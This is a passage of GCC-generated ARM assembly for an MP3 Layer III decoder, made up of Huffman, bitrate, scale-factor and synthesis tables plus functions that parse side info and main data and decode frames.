.short 188 .short 218 .short 513 .short 173 .short 233 .short 1025 .short 513 .short 158 .short 204 .short 513 .short 219 .short 189 .short 4097 .short 2049 .short 1025 .short 513 .short 234 .short 174 .short 513 .short 220 .short 205 .short 1025 .short 513 .short 235 .short 190 .short 513 .short 221 .short 236 .short 2049 .short 1025 .short 513 .short 206 .short 237 .short 513 .short 222 .short 238 .short 15 .short 1025 .short 513 .short 240 .short 31 .short 241 .short 1025 .short 513 .short 242 .short 47 .short 513 .short 243 .short 63 .short 4609 .short 2049 .short 1025 .short 513 .short 244 .short 79 .short 513 .short 245 .short 95 .short 1025 .short 513 .short 246 .short 111 .short 513 .short 247 .short 513 .short 127 .short 143 .short 2561 .short 1025 .short 513 .short 248 .short 249 .short 1025 .short 513 .short 159 .short 175 .short 250 .short 2049 .short 1025 .short 513 .short 251 .short 191 .short 513 .short 252 .short 207 .short 1025 .short 513 .short 253 .short 223 .short 513 .short 254 .short 239 .short 513 .short 0 .short 2049 .short 1025 .short 513 .short 8 .short 4 .short 513 .short 1 .short 2 .short 2049 .short 1025 .short 513 .short 12 .short 10 .short 513 .short 3 .short 6 .short 1537 .short 513 .short 9 .short 513 .short 5 .short 7 .short 1025 .short 513 .short 14 .short 13 .short 513 .short 15 .short 11 .short 4097 .short 2049 .short 1025 .short 513 .short 0 .short 1 .short 513 .short 2 .short 3 .short 1025 .short 513 .short 4 .short 5 .short 513 .short 6 .short 7 .short 2049 .short 1025 .short 513 .short 8 .short 9 .short 513 .short 10 .short 11 .short 1025 .short 513 .short 12 .short 13 .short 513 .short 14 .short 15 .align 2 .type g_mpeg1_bitrates, %object .size g_mpeg1_bitrates, 180 g_mpeg1_bitrates: .word 0 .word 32000 .word 64000 .word 96000 .word 128000 .word 160000 .word 192000 .word 224000 .word 256000 .word 288000 .word 320000 .word 352000 .word 384000 .word 416000 .word 448000 .word 0 .word 32000 .word 48000 .word 56000 .word 64000 .word 80000 .word 96000 .word 112000 .word 128000 .word 160000 .word 192000 .word 224000 .word 256000 .word 320000 .word 384000 .word 0 .word 32000 .word 40000 .word 48000 .word 56000 .word 64000 .word 80000 .word 96000 .word 112000 .word 128000 .word 160000 .word 192000 .word 224000 .word 256000 .word 320000 .align 2 .type g_sampling_frequency, %object .size g_sampling_frequency, 12 g_sampling_frequency: .word 44100 .word 48000 .word 32000 .align 2 .type mpeg1_scalefac_sizes, %object .size mpeg1_scalefac_sizes, 128 mpeg1_scalefac_sizes: .word 0 .word 0 .word 0 .word 1 .word 0 .word 2 .word 0 .word 3 .word 3 .word 0 .word 1 .word 1 .word 1 .word 2 .word 1 .word 3 .word 2 .word 1 .word 2 .word 2 .word 2 .word 3 .word 3 .word 1 .word 3 .word 2 .word 3 .word 3 .word 4 .word 2 .word 4 .word 3 .global g_huffman_main .data .align 2 .type g_huffman_main, %object .size g_huffman_main, 272 g_huffman_main: .word 0 .short 0 .byte 0 .space 1 .word g_huffman_table .short 7 .byte 0 .space 1 .word g_huffman_table+14 .short 17 .byte 0 .space 1 .word g_huffman_table+48 .short 17 .byte 0 .space 1 .word 0 .short 0 .byte 0 .space 1 .word g_huffman_table+82 .short 31 .byte 0 .space 1 .word g_huffman_table+144 .short 31 .byte 0 .space 1 .word g_huffman_table+206 .short 71 .byte 0 .space 1 .word g_huffman_table+348 .short 71 .byte 0 .space 1 .word g_huffman_table+490 .short 71 .byte 0 .space 1 .word g_huffman_table+632 .short 127 .byte 0 .space 1 .word g_huffman_table+886 .short 127 .byte 0 .space 1 .word g_huffman_table+1140 .short 127 .byte 0 .space 1 .word g_huffman_table+1394 .short 511 .byte 0 .space 1 .word 0 .short 0 .byte 0 .space 1 .word g_huffman_table+2416 .short 511 .byte 0 .space 1 .word g_huffman_table+3438 .short 511 .byte 1 .space 1 .word g_huffman_table+3438 .short 511 .byte 2 .space 1 .word g_huffman_table+3438 .short 511 .byte 3 .space 1 .word g_huffman_table+3438 .short 511 .byte 4 .space 1 .word g_huffman_table+3438 .short 511 .byte 6 .space 1 .word g_huffman_table+3438 .short 511 .byte 8 .space 1 .word g_huffman_table+3438 .short 511 .byte 10 .space 1 .word g_huffman_table+3438 .short 511 .byte 13 .space 1 .word g_huffman_table+4460 .short 512 .byte 4 .space 1 .word g_huffman_table+4460 .short 512 .byte 5 .space 1 .word g_huffman_table+4460 .short 512 .byte 6 .space 1 .word g_huffman_table+4460 .short 512 .byte 7 .space 1 .word g_huffman_table+4460 .short 512 .byte 8 .space 1 .word g_huffman_table+4460 .short 512 .byte 9 .space 1 .word g_huffman_table+4460 .short 512 .byte 11 .space 1 .word g_huffman_table+4460 .short 512 .byte 13 .space 1 .word g_huffman_table+5484 .short 31 .byte 0 .space 1 .word g_huffman_table+4522 .short 31 .byte 0 .space 1 .section .rodata .align 2 .type ci, %object .size ci, 32 ci: .word 3206125978 .word 3205035459 .word 3198744003 .word 3191697572 .word 3183644508 .word 3173511070 .word 3160975134 .word 3144842163 .align 2 .type cs, %object .size cs, 32 cs: .word 1062962345 .word 1063369176 .word 1064508131 .word 1065073288 .word 1065278021 .word 1065339140 .word 1065351522 .word 1065353099 .align 2 .type ca, %object .size ca, 32 ca: .word 3204691459 .word 3203499739 .word 3198186227 .word 3191490407 .word 3183587331 .word 3173501943 .word 3160974060 .word 3144842163 .align 2 .type is_ratios, %object .size is_ratios, 24 is_ratios: .word 0 .word 1049178268 .word 1058262326 .word 1065353216 .word 1071494105 .word 1081006572 .align 2 .type g_synth_dtbl, %object .size g_synth_dtbl, 2048 g_synth_dtbl: .word 0 .word 3078619252 .word 3078619252 .word 3078619252 .word 3078619252 .word 3078619252 .word 3078619252 .word 3087007860 .word 3087007860 .word 3087007860 .word 3087007860 .word 3091201947 .word 3091201947 .word 3095396309 .word 3095396309 .word 3097493512 .word 3097493512 .word 3099590693 .word 3101687873 .word 3101687873 .word 3103784917 .word 3104833529 .word 3105882120 .word 3106930710 .word 3109027822 .word 3110076413 .word 3112173581 .word 3112697842 .word 3113746432 .word 3114795023 .word 3116367874 .word 3117416465 .word 3118989316 .word 3120037872 .word 3121348615 .word 3122135040 .word 3122921466 .word 3123970056 .word 3125018630 .word 3126067203 .word 3127377924 .word 3128688645 .word 3129475075 .word 3130130435 .word 3130916861 .word 3131703295 .word 3132489730 .word 3133276164 .word 3134193663 .word 3135111172 .word 3135897597 .word 3136946179 .word 3137601535 .word 3138060289 .word 3138584576 .word 3139043330 .word 3139502080 .word 3140026366 .word 3140485121 .word 3140943870 .word 3141402624 .word 3141795841 .word 3142189054 .word 3142582271 .word 995426304 .word 995753984 .word 996016127 .word 996212738 .word 996343807 .word 996409344 .word 996409344 .word 996343807 .word 996147201 .word 995950590 .word 995557378 .word 995098623 .word 994574337 .word 993853439 .word 993067009 .word 992149506 .word 991035391 .word 989724670 .word 986972163 .word 983957500 .word 979632128 .word 971505668 .word 3087007860 .word 3121610745 .word 3129999362 .word 3135111172 .word 3138977793 .word 3141861374 .word 3144941570 .word 3146973184 .word 3148709888 .word 3150479359 .word 3152379904 .word 3154231297 .word 3155247104 .word 3156295680 .word 3157377024 .word 3158491136 .word 3159621632 .word 3160784896 .word 3161964544 .word 3162832896 .word 3163430912 .word 3164028928 .word 3164626944 .word 3165224960 .word 3165814784 .word 3166388224 .word 3166953472 .word 3167502336 .word 3168026624 .word 3168526336 .word 3169001472 .word 3169435648 .word 3169837056 .word 3170189312 .word 3170508800 .word 3170762752 .word 3170930688 .word 3171004416 .word 3171045376 .word 3171053568 .word 3171024896 .word 3170955264 .word 1023320064 .word 1023016960 .word 1022623744 .word 1022140416 .word 1021558784 .word 1020878848 .word 1020100608 .word 1019207680 .word 1018216448 .word 1017118720 .word 1015898112 .word 1014136832 .word 1011253249 .word 1008156672 .word 1003028480 .word 993591296 .word 3123970056 .word 3146776575 .word 3154657280 .word 3159064576 .word 3163086848 .word 3165487104 .word 3167977472 .word 3170549760 .word 3172048896 .word 3173412864 .word 3174809600 .word 3176230912 .word 3177680896 .word 3179147264 .word 3179956224 .word 3180699648 .word 3181447168 .word 3182192640 .word 3182934016 .word 3183667200 .word 3184388096 .word 3185096704 .word 3185784832 .word 3186452480 .word 3187093504 .word 3187688448 .word 3187977216 .word 3188247552 .word 3188496384 .word 3188722688 .word 3188924416 .word 3189097472 .word 3189242880 .word 3189356544 .word 3189436416 .word 3189480448 .word 3189487616 .word 3189455872 .word 3189382144 .word 3189266432 .word 3189104640 .word 3188896768 .word 3188640768 .word 3188334592 .word 3187978240 .word 3187466240 .word 3186540544 .word 3185504256 .word 1036873728 .word 1035614208 .word 1034240000 .word 1032751104 .word 1030488064 .word 1027043328 .word 1023320064 .word 1015496704 .word 982253566 .word 3162079231 .word 3171196928 .word 3176022016 .word 3180177408 .word 3182809088 .word 3185545216 .word 3188027392 .word 3189496832 .word 3191012352 .word 3192573952 .word 3194179584 .word 3195825152 .word 3196784128 .word 3197643776 .word 3198519808 .word 3199410688 .word 3200314368 .word 3201229824 .word 3202155008 .word 3203088384 .word 3204027904 .word 3204710144 .word 3205183488 .word 3205656832 .word 3206129664 .word 3206600704 .word 3207069184 .word 3207533824 .word 3207993600 .word 3208447488 .word 3208894720 .word 3209334016 .word 3209764352 .word 3210185216 .word 3210594816 .word 3210992896 .word 3211378176 .word 3211749632 .word 3212106752 .word 3212448512 .word 3212773888 .word 3212959488 .word 3213104768 .word 3213240832 .word 3213367168 .word 3213483776 .word 3213590016 .word 3213685888 .word 3213771136 .word 3213845376 .word 3213908480 .word 3213960320 .word 3214000896 .word 3214029824 .word 3214047232 .word 1066569472 .word 1066563584 .word 1066546176 .word 1066517248 .word 1066476672 .word 1066424832 .word 1066361728 .word 1066287488 .word 1066202240 .word 1066106368 .word 1066000128 .word 1065883520 .word 1065757184 .word 1065621120 .word 1065475840 .word 1065290240 .word 1064964864 .word 1064623104 .word 1064265984 .word 1063894528 .word 1063509248 .word 1063111168 .word 1062701568 .word 1062280704 .word 1061850368 .word 1061411072 .word 1060963840 .word 1060509952 .word 1060050176 .word 1059585536 .word 1059117056 .word 1058646016 .word 1058173184 .word 1057699840 .word 1057226496 .word 1056544256 .word 1055604736 .word 1054671360 .word 1053746176 .word 1052830720 .word 1051927040 .word 1051036160 .word 1050160128 .word 1049300480 .word 1048341504 .word 1046695936 .word 1045090304 .word 1043528704 .word 1042013184 .word 1040543744 .word 1038061568 .word 1035325440 .word 1032693760 .word 1028538368 .word 1023713280 .word 1014595583 .word 3129737214 .word 3162980352 .word 3170803712 .word 3174526976 .word 3177971712 .word 3180234752 .word 3181723648 .word 3183097856 .word 1036873728 .word 1038020608 .word 1039056896 .word 1039982592 .word 1040494592 .word 1040850944 .word 1041157120 .word 1041413120 .word 1041620992 .word 1041782784 .word 1041898496 .word 1041972224 .word 1042003968 .word 1041996800 .word 1041952768 .word 1041872896 .word 1041759232 .word 1041613824 .word 1041440768 .word 1041239040 .word 1041012736 .word 1040763904 .word 1040493568 .word 1040204800 .word 1039609856 .word 1038968832 .word 1038301184 .word 1037613056 .word 1036904448 .word 1036183552 .word 1035450368 .word 1034708992 .word 1033963520 .word 1033216000 .word 1032472576 .word 1031663616 .word 1030197248 .word 1028747264 .word 1027325952 .word 1025929216 .word 1024565248 .word 1023066112 .word 1020493824 .word 1018003456 .word 1015603200 .word 1011580928 .word 1007173632 .word 999292927 .word 976486408 .word 3141074944 .word 3150512128 .word 3155640320 .word 3158736897 .word 3161620480 .word 3163381760 .word 3164602368 .word 3165700096 .word 3166691328 .word 3167584256 .word 3168362496 .word 3169042432 .word 3169624064 .word 3170107392 .word 3170500608 .word 1023320064 .word 1023471616 .word 1023541248 .word 1023569920 .word 1023561728 .word 1023520768 .word 1023447040 .word 1023279104 .word 1023025152 .word 1022705664 .word 1022353408 .word 1021952000 .word 1021517824 .word 1021042688 .word 1020542976 .word 1020018688 .word 1019469824 .word 1018904576 .word 1018331136 .word 1017741312 .word 1017143296 .word 1016545280 .word 1015947264 .word 1015349248 .word 1014480896 .word 1013301248 .word 1012137984 .word 1011007488 .word 1009893376 .word 1008812032 .word 1007763456 .word 1006747649 .word 1004896256 .word 1002995711 .word 1001226240 .word 999489536 .word 997457922 .word 994377726 .word 991494145 .word 987627524 .word 982515714 .word 974127097 .word 939524212 .word 3118989316 .word 3127115776 .word 3131441148 .word 3134455811 .word 3137208318 .word 3138519039 .word 3139633154 .word 3140550657 .word 3141337087 .word 3142057985 .word 3142582271 .word 3143041026 .word 3143434238 .word 3143630849 .word 3143827455 .word 3143892992 .word 3143892992 .word 3143827455 .word 3143696386 .word 3143499775 .word 3143237632 .word 995426304 .word 995098623 .word 994705406 .word 994312193 .word 993918976 .word 993460222 .word 993001473 .word 992542718 .word 992018432 .word 991559682 .word 991100928 .word 990576641 .word 990117887 .word 989462531 .word 988413949 .word 987627524 .word 986710015 .word 985792516 .word 985006082 .word 984219647 .word 983433213 .word 982646787 .word 981991427 .word 981204997 .word 979894276 .word 978583555 .word 977534982 .word 976486408 .word 975437818 .word 974651392 .word 973864967 .word 972554224 .word 971505668 .word 969932817 .word 968884226 .word 967311375 .word 966262784 .word 965214194 .word 964689933 .word 962592765 .word 961544174 .word 959447062 .word 958398472 .word 957349881 .word 956301269 .word 954204225 .word 954204225 .word 952107045 .word 950009864 .word 950009864 .word 947912661 .word 947912661 .word 943718299 .word 943718299 .word 939524212 .word 939524212 .word 939524212 .word 939524212 .word 931135604 .word 931135604 .word 931135604 .word 931135604 .word 931135604 .word 931135604 .data .align 2 .type hsynth_init, %object .size hsynth_init, 4 hsynth_init: .word 1 .align 2 .type synth_init, %object .size synth_init, 4 synth_init: .word 1 .local g_main_data_vec .comm g_main_data_vec,8192,4 .local g_main_data_ptr .comm g_main_data_ptr,4,4 .local g_main_data_idx .comm g_main_data_idx,4,4 .local g_main_data_top .comm g_main_data_top,4,4 .local side_info_vec .comm side_info_vec,144,4 .local side_info_ptr .comm side_info_ptr,4,4 .local side_info_idx .comm side_info_idx,4,4 .section .rodata .align 2 .type g_sf_band_indices, %object .size g_sf_band_indices, 444 g_sf_band_indices: .word 0 .word 4 .word 8 .word 12 .word 16 .word 20 .word 24 .word 30 .word 36 .word 44 .word 52 .word 62 .word 74 .word 90 .word 110 .word 134 .word 162 .word 196 .word 238 .word 288 .word 342 .word 418 .word 576 .word 0 .word 4 .word 8 .word 12 .word 16 .word 22 .word 30 .word 40 .word 52 .word 66 .word 84 .word 106 .word 136 .word 192 .word 0 .word 4 .word 8 .word 12 .word 16 .word 20 .word 24 .word 30 .word 36 .word 42 .word 50 .word 60 .word 72 .word 88 .word 106 .word 128 .word 156 .word 190 .word 230 .word 276 .word 330 .word 384 .word 576 .word 0 .word 4 .word 8 .word 12 .word 16 .word 22 .word 28 .word 38 .word 50 .word 64 .word 80 .word 100 .word 126 .word 192 .word 0 .word 4 .word 8 .word 12 .word 16 .word 20 .word 24 .word 30 .word 36 .word 44 .word 54 .word 66 .word 82 .word 102 .word 126 .word 156 .word 194 .word 240 .word 296 .word 364 .word 448 .word 550 .word 576 .word 0 .word 4 .word 8 .word 12 .word 16 .word 22 .word 30 .word 42 .word 58 .word 78 .word 104 .word 138 .word 180 .word 192 .local fp .comm fp,4,4 .local g_frame_header .comm g_frame_header,48,4 .local g_side_info .comm g_side_info,344,4 .local g_main_data .comm g_main_data,10128,4 .global __aeabi_ui2f .text .align 2 .syntax unified .arm .fpu softvfp .type Requantize_Pow_43, %function Requantize_Pow_43: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r0, [fp, #-8] bl __aeabi_ui2f mov r3, r0 ldr r1, .L3 mov r0, r3 bl powf mov r3, r0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L4: .align 2 .L3: .word 1068149419 .size Requantize_Pow_43, .-Requantize_Pow_43 .section .rodata .align 2 .LC1: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type Decode_L3, %function Decode_L3: @ args = 0, pretend = 0, frame = 2320 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #2320 ldr r3, .L16 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, .L16+4 ldr r3, [r3, #28] cmp r3, #3 bne .L6 mov r3, #1 b .L7 .L6: mov r3, #2 .L7: str r3, [fp, #-2316] mov r3, #0 str r3, [fp, #-2324] b .L8 .L13: mov r3, #0 str r3, [fp, #-2320] b .L9 .L10: ldr r1, [fp, #-2320] ldr r0, [fp, #-2324] bl L3_Requantize ldr r1, [fp, #-2320] ldr r0, [fp, #-2324] bl L3_Reorder ldr r3, [fp, #-2320] add r3, r3, #1 str r3, [fp, #-2320] .L9: ldr r2, [fp, #-2320] ldr r3, [fp, #-2316] cmp r2, r3 bcc .L10 ldr r0, [fp, #-2324] bl L3_Stereo mov r3, #0 str r3, [fp, #-2320] b .L11 .L12: ldr r1, [fp, #-2320] ldr r0, [fp, #-2324] bl L3_Antialias ldr r1, [fp, #-2320] ldr r0, [fp, #-2324] bl L3_Hybrid_Synthesis ldr r1, [fp, #-2320] ldr r0, [fp, #-2324] bl L3_Frequency_Inversion sub r3, fp, #2304 sub r3, r3, #4 sub r3, r3, #4 mov r2, r3 ldr r1, [fp, #-2320] ldr r0, [fp, #-2324] bl L3_Subband_Synthesis ldr r3, [fp, #-2320] add r3, r3, #1 str r3, [fp, #-2320] .L11: ldr r2, [fp, #-2320] ldr r3, [fp, #-2316] cmp r2, r3 bcc .L12 ldr r3, .L16+4 ldr r3, [r3, #16] ldr r2, .L16+8 ldr r3, [r2, r3, lsl #2] mov r2, r3 sub r3, fp, #2304 sub r3, r3, #4 sub r3, r3, #4 mov r1, #576 mov r0, r3 bl audio_write ldr r3, [fp, #-2324] add r3, r3, #1 str r3, [fp, #-2324] .L8: ldr r3, [fp, #-2324] cmp r3, #1 bls .L13 mov r3, #0 ldr r2, .L16 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L15 bl __stack_chk_fail .L15: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L17: .align 2 .L16: .word .LC1 .word g_frame_header .word g_sampling_frequency .size Decode_L3, .-Decode_L3 .align 2 .syntax unified .arm .fpu softvfp .type Get_Bytes, %function Get_Bytes: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #0 str r3, [fp, #-12] b .L19 .L22: bl Get_Byte str r0, [fp, #-8] ldr r3, [fp, #-8] cmn r3, #1 bne .L20 mvn r3, #0 b .L21 .L20: ldr r3, [fp, #-12] lsl r3, r3, #2 ldr r2, [fp, #-20] add r3, r2, r3 ldr r2, [fp, #-8] str r2, [r3] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L19: ldr r3, [fp, #-12] ldr r2, [fp, #-16] cmp r2, r3 bhi .L22 mov r3, #0 .L21: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size Get_Bytes, .-Get_Bytes .section .rodata .align 2 .LC2: .ascii "main_data_size = %d\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Get_Main_Data, %function Get_Main_Data: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] ldr r3, [fp, #-16] ldr r2, .L29 cmp r3, r2 bls .L24 ldr r3, .L29+4 ldr r3, [r3] ldr r2, [fp, #-16] ldr r1, .L29+8 mov r0, r3 bl fprintf ldr r3, .L29+4 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc .L24: ldr r3, .L29+12 ldr r3, [r3] ldr r2, [fp, #-20] cmp r2, r3 bls .L25 ldr r3, .L29+12 ldr r3, [r3] lsl r3, r3, #2 ldr r2, .L29+16 add r3, r3, r2 mov r1, r3 ldr r0, [fp, #-16] bl Get_Bytes ldr r3, .L29+20 ldr r2, .L29+16 str r2, [r3] ldr r3, .L29+24 mov r2, #0 str r2, [r3] ldr r3, .L29+12 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 ldr r2, .L29+12 str r3, [r2] mvn r3, #0 b .L26 .L25: mov r3, #0 str r3, [fp, #-12] b .L27 .L28: ldr r3, .L29+12 ldr r2, [r3] ldr r3, [fp, #-20] sub r2, r2, r3 ldr r3, [fp, #-12] add r3, r2, r3 ldr r2, .L29+16 ldr r2, [r2, r3, lsl #2] ldr r1, .L29+16 ldr r3, [fp, #-12] str r2, [r1, r3, lsl #2] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L27: ldr r3, [fp, #-12] ldr r2, [fp, #-20] cmp r2, r3 bhi .L28 bl Get_Filepos mov r3, r0 str r3, [fp, #-8] ldr r3, [fp, #-20] lsl r3, r3, #2 ldr r2, .L29+16 add r3, r3, r2 mov r1, r3 ldr r0, [fp, #-16] bl Get_Bytes ldr r3, .L29+20 ldr r2, .L29+16 str r2, [r3] ldr r3, .L29+24 mov r2, #0 str r2, [r3] ldr r2, [fp, #-20] ldr r3, [fp, #-16] add r3, r2, r3 ldr r2, .L29+12 str r3, [r2] mov r3, #0 .L26: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L30: .align 2 .L29: .word 1500 .word stderr .word .LC2 .word g_main_data_top .word g_main_data_vec .word g_main_data_ptr .word g_main_data_idx .size Get_Main_Data, .-Get_Main_Data .global __aeabi_uidiv .section .rodata .align 2 .LC3: .ascii "framesize = %d\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type Read_Audio_L3, %function Read_Audio_L3: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #40 ldr r3, .L60 ldr r3, [r3, #28] cmp r3, #3 bne .L32 mov r3, #1 b .L33 .L32: mov r3, #2 .L33: str r3, [fp, #-20] ldr r3, .L60 ldr r3, [r3, #4] sub r2, r3, #1 ldr r3, .L60 ldr r1, [r3, #12] ldr r0, .L60+4 mov r3, r2 lsl r3, r3, #4 sub r3, r3, r2 add r3, r3, r1 ldr r2, [r0, r3, lsl #2] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #4 mov r0, r3 ldr r3, .L60 ldr r3, [r3, #16] ldr r2, .L60+8 ldr r3, [r2, r3, lsl #2] mov r1, r3 bl __aeabi_uidiv mov r3, r0 mov r2, r3 ldr r3, .L60 ldr r3, [r3, #20] add r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-16] cmp r3, #2000 bls .L34 ldr r3, .L60+12 ldr r3, [r3] ldr r2, [fp, #-16] ldr r1, .L60+16 mov r0, r3 bl fprintf ldr r3, .L60+12 ldr r3, [r3] mov r1, r3 mov r0, #10 bl fputc mvn r3, #0 b .L35 .L34: ldr r3, [fp, #-20] cmp r3, #1 bne .L36 mov r3, #17 b .L37 .L36: mov r3, #32 .L37: str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-12] sub r3, r2, r3 sub r3, r3, #4 str r3, [fp, #-8] ldr r3, .L60 ldr r3, [r3, #8] cmp r3, #0 bne .L38 ldr r3, [fp, #-8] sub r3, r3, #2 str r3, [fp, #-8] .L38: ldr r0, [fp, #-12] bl Get_Sideinfo bl Get_Filepos mov r3, r0 cmn r3, #1 bne .L39 mvn r3, #0 b .L35 .L39: mov r0, #9 bl Get_Side_Bits mov r3, r0 ldr r2, .L60+20 str r3, [r2] ldr r3, .L60 ldr r3, [r3, #28] cmp r3, #3 bne .L40 mov r0, #5 bl Get_Side_Bits mov r3, r0 ldr r2, .L60+20 str r3, [r2, #4] b .L41 .L40: mov r0, #3 bl Get_Side_Bits mov r3, r0 ldr r2, .L60+20 str r3, [r2, #4] .L41: mov r3, #0 str r3, [fp, #-40] b .L42 .L45: mov r3, #0 str r3, [fp, #-32] b .L43 .L44: mov r0, #1 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-40] lsl r2, r3, #2 ldr r3, [fp, #-32] add r3, r2, r3 add r3, r3, #2 str r1, [r0, r3, lsl #2] ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] .L43: ldr r3, [fp, #-32] cmp r3, #3 bls .L44 ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L42: ldr r2, [fp, #-40] ldr r3, [fp, #-20] cmp r2, r3 bcc .L45 mov r3, #0 str r3, [fp, #-36] b .L46 .L59: mov r3, #0 str r3, [fp, #-40] b .L47 .L58: mov r0, #12 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #10 str r1, [r0, r3, lsl #2] mov r0, #9 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #14 str r1, [r0, r3, lsl #2] mov r0, #8 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #18 str r1, [r0, r3, lsl #2] mov r0, #4 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #22 str r1, [r0, r3, lsl #2] mov r0, #1 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #26 str r1, [r0, r3, lsl #2] ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L48 mov r0, #2 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #30 str r1, [r0, r3, lsl #2] mov r0, #1 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #34 str r1, [r0, r3, lsl #2] mov r3, #0 str r3, [fp, #-28] b .L49 .L50: mov r0, #5 bl Get_Side_Bits ldr ip, .L60+20 ldr r3, [fp, #-40] ldr r1, [fp, #-36] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #1 add r2, r2, r3 ldr r3, [fp, #-28] add r3, r2, r3 add r3, r3, #38 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L49: ldr r3, [fp, #-28] cmp r3, #1 bls .L50 mov r3, #0 str r3, [fp, #-24] b .L51 .L52: mov r0, #3 bl Get_Side_Bits ldr ip, .L60+20 ldr r3, [fp, #-40] ldr r1, [fp, #-36] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #1 add r2, r2, r3 ldr r3, [fp, #-24] add r3, r2, r3 add r3, r3, #50 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L51: ldr r3, [fp, #-24] cmp r3, #2 bls .L52 ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L53 ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #34 ldr r3, [r1, r3, lsl #2] cmp r3, #0 bne .L53 ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #62 mov r2, #8 str r2, [r1, r3, lsl #2] b .L54 .L53: ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #62 mov r2, #7 str r2, [r1, r3, lsl #2] .L54: ldr r1, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #62 ldr r3, [r1, r3, lsl #2] rsb r2, r3, #20 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r1, r3, #1 ldr r3, [fp, #-40] add r3, r1, r3 add r3, r3, #66 str r2, [r0, r3, lsl #2] b .L55 .L48: mov r3, #0 str r3, [fp, #-28] b .L56 .L57: mov r0, #5 bl Get_Side_Bits ldr ip, .L60+20 ldr r3, [fp, #-40] ldr r1, [fp, #-36] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #1 add r2, r2, r3 ldr r3, [fp, #-28] add r3, r2, r3 add r3, r3, #38 str r0, [ip, r3, lsl #2] ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L56: ldr r3, [fp, #-28] cmp r3, #2 bls .L57 mov r0, #4 bl Get_Side_Bits mov r1, r0 ldr r0, .L60+20 ldr r3, [fp, #-36] lsl r2, r3, #1 ldr r3, [fp, #-40] add r3, r2, r3 add r3, r3, #62 str r1, 